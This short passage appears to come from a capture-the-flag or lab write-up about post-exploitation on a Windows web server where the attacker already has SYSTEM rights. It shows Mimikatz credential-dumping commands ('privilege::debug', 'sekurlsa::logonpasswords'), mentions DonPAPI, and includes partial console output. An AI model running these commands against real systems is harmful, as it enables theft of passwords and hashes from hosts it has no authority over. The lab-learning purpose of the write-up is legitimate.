2-Web SERVER
2-Web SERVER
we Have Permission System now we can read Flag in directory c:\users\administrator\desktop . but we need dump all hashes and password strong plain
Text in system upload Mimikatz And donpapi Tools
Dump Hashes And Password Plain Text
Mimikatz
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Donpapi
C:\Windows\system32> hostname
secure
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>